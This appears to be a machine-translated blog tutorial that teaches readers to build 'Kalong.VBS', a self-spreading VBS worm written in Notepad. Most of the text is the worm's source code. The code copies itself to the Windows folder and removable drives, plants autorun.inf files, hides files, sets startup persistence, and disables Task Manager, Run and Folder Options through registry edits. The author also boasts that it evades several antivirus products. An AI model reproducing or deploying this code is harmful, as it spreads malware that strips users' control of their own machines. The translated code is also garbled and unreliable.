Flash fad Disc striking my brother suddenly I nemu a local malcode VBS made with the language. Well, it turns out the virus makers began to look at language use VBS. Maybe because it involves the IPR (Intellectual Property Rights) because of the many outstanding VB6.0 is pirated. So he made a VBS virus that can be made only with the Windows Notepad because the existing compiler is integrated with it, the Windows Based Script Host.
I promise something, we'll create a simple virus using Notepad. This virus will make itself spread to removable disc with autorun so that other computers that are infected will flash disc plugged directly into the victim without the user waited for her to run infector. I named this virus "Kalong.VBS". Now open Notepad her.Copy the following code:
'/ /-The beginning of the code, set so that when the error is left and then continue the activities of virus-/ / on error resume next
'/ /-Dim following words-/ / dim rekur, windowpath, flashdrive, fs, mf, content, tf, fruit bats, nt, check, sd
'/ /-Set of a text that will be made for the Autorun Setup Information-/ / contents = "[autorun]" & vbCrLf & "ShellExecute = wscript.exe k4l0n6.dll.vbs" set fs = CreateObject ("Scripting.FileSystemObject" ) set mf = fs.getfile (Wscript.ScriptFullname) dim text, size = size = mf.size check mf.drive.drivetype mf.openastextstream set text = (1, -2) do while not text.atendofstream rekur = rekur & text.readline rekur = rekur & vbCrLf loops do'/ /-Copy itself to become the master file in the Windows Path (example: C: \ Windows) Set windowpath = fs.getspecialfolder (0) set tf = fs.getfile (windowpath & "\ batch-k4l0n6.dll.vbs") tf.attributes = 32 set tf = fs.createtextfile (windowpath & "\ batch-k4l0n6.dll.vbs", 2, true) tf.write tf.close recursive set tf = fs.getfile (windowpath & "\ batch-k4l0n6 . dll.vbs ") tf.attributes = 39 '/ /-Make Atorun.inf to run the virus automatically each flash disc plugged-/ /' It spreads to every drive that bertype 1 and 2 (removable) including diskettes
for each flashdrive in fs.drives' / /-Check the Drive-/ / If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
'/ /-Make infector if it turns out Drivetypr 1 or 2. Or A: \ - / / set tf = fs.getfile (flashdrive.path & "\ k4l0n6.dll.vbs") tf.attributes = 32 set tf = fs.createtextfile (flashdrive.path & "\ k4l0n6.dll.vbs ', 2, true) tf.write tf.close recursive set tf = fs.getfile (flashdrive.path & "\ k4l0n6.dll.vbs") tf.attributes = 39
'/ /-Make the text of his Atorun.inf had been prepared (Auto Setup Information) - / / set tf = fs.getfile (flashdrive.path & "\ autorun.inf") tf.attributes = 32 set tf = fs . createtextfile (flashdrive.path & "\ autorun.inf", 2, true) tf.write content tf.close set tf = fs.getfile (flashdrive.path & "\ autorun.inf") tf.attributes = 39 end if next
'/ /-Manipulation Registry-/ /
set bat = CreateObject ("WScript.Shell")'/ /-Manip - Change Internet Explorer Title to be THE Bats vs. Zay-/ / kalong.regwrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ Main \ Window Title", "THE Bats vs. Zay"
'/ /-Manip - Set so that hidden files are not displayed in Explorer-/ / kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ Advanced \ Hidden", "0", "REG_DWORD"
'/ /-Manip - Eliminate the Find menu, Folder Options, Run, and block the Regedit and Task Manager-/ / kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoFind", "1", " REG_DWORD "kalong.RegWrite" HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoFolderOptions "," 1 "," REG_DWORD "kalong.RegWrite" HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoRun " , "1", "REG_DWORD" kalong.RegWrite "1", "REG_DWORD" kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System \ DisableTaskMgr", "1", "REG_DWORD"'/ /-Manip - Disable right-click / / kalong.RegWrite "1", "REG_DWORD"
'/ /-Manip - Come up with messages every Windows Startup-/ / kalong.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Winlogon \ LegalNoticeCaption", "Worm Bats. Variant from Rangga-Zay, do not panic all data are safe. "
'/ /-Manip - On every Windows Startup-/ / kalong.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ Systemdir", windowpath & "\ batch-k4l0n6.dll.vbs"
'/ /-Manip - RegisteredOwner and Organization Change-/ / kalong.regwrite "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ RegisteredOrganization", "The Batrix" kalong.regwrite "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ RegisteredOwner "," Bats "
'/ /-Now if the code below I do not know, please Mas Aat_S to explain / / if check <> 1 then WScript.Sleep 200 000 end if loop while check <> 1 set sd = CreateObject ("WScript.Shell") sd.run windowpath & "\ explorer.exe / e, / select," & Wscript.ScriptFullname 'End of CodeSave the code in Notepad by FILE> SAVE. Then in the save as type choose "All Files (*.*). Save with the name: k4l0n6.dll.vbs. Actually not have pake *. dll also do nothing but attempt to avoid suspicious wrote.
He .. he ... Viruses worm is not purely of my own thoughts because it mimics the virus code Rangga-Zay. But this one was better because it is not detected using PCMAV RC15, ClamAV, and AVAST. Itung-itung is for you to know if it makes a virus / worm does not need to purchase pirated software. Use Notepad (from Windows Original) can.
